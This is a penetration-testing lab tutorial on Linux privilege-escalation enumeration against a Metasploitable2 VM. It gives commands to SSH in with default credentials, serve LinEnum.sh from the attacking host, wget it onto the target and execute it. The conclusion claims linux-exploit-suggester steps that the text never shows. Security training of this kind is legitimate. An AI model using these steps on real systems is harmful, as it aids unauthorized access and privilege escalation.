In this lab, we will explore two of the most commonly used Linux privilege escalation automation tools - LinEnum and linux-exploit-suggester. The goal is to learn how to leverage these tools effectively to expedite the privilege escalation process during a penetration test or security assessment. Mastering these tools can significantly save time and effort, allowing you to focus on understanding the underlying principles and methodologies of privilege escalation.
In this step, we will set up the Metasploitable2 virtual machine, which will serve as our target system. Follow the instructions below to start the virtual machine and establish a connection:
In out lab environment, the configuration of the Metasploitable2 virtual machine have been pre-configured. You can start the virtual machine and connect to it using the following steps:
Open a terminal and run the following command to start the Metasploitable2 virtual machine:
sudo virsh start Metasploitable2Wait for 1-2 minutes until the virtual machine is fully booted and ready.
Verify that you can ping the Metasploitable2 IP address (192.168.122.102) from your host machine.
Use the following command to connect to the Metasploitable2 virtual machine via SSH:
ssh msfadmin@192.168.122.102At the first connection, you will be prompted to accept the authenticity of the host. Type yes and press Enter to continue.
Then enter the msfadmin password when prompted:
msfadminAfter successful authentication, you should have a low-privileged shell session on the Metasploitable2 virtual machine.
LinEnum is a powerful script that automates the enumeration process on a Linux system, gathering valuable information that can aid in the privilege escalation process. Follow the steps below to use LinEnum on the Metasploitable2 virtual machine:
On your host machine, open a terminal and navigate to the /tmp directory:
cd /tmpThere is a script called LinEnum.sh in the /tmp directory of the project.
Start a Python HTTP server in the /tmp directory to host the LinEnum script:
python3 -m http.server 8000On the Metasploitable2 VM, navigate to the /tmp directory and download the LinEnum script using wget from the Python HTTP server running on your host machine:
Navigate to the /tmp directory:
cd /tmpwget 192.168.122.1:8000/LinEnum.sh -P /tmpMake the LinEnum script executable:
chmod +x LinEnum.shExecute the LinEnum script and redirect the output to a file for further analysis:
LinEnum.sh > linenum_output.txtLinEnum will perform various checks and enumerate system information, highlighting potential vulnerabilities or misconfigurations in yellow text. Pay close attention to these highlighted areas, as they may reveal opportunities for privilege escalation.
In this lab, we learned how to use two powerful automation tools, LinEnum and linux-exploit-suggester, to assist in the privilege escalation process on Linux systems. LinEnum provides a comprehensive enumeration of system information, highlighting potential vulnerabilities and misconfigurations. The linux-exploit-suggester tool analyzes the kernel version and suggests relevant kernel exploits that could lead to privilege escalation.
By leveraging these tools, we can streamline the information-gathering and analysis phases, saving valuable time during a penetration test or security assessment. However, it's crucial to understand that these tools are meant to aid in the process, and a solid understanding of privilege escalation techniques and methodologies is still essential for successful exploitation.
Throughout this lab, we practiced setting up a vulnerable virtual machine environment, downloading and executing the LinEnum and linux-exploit-suggester scripts, and interpreting their outputs. The hands-on experience gained from this lab will be invaluable in real-world scenarios, where efficient and effective privilege escalation is a critical skill for ethical hackers and security professionals.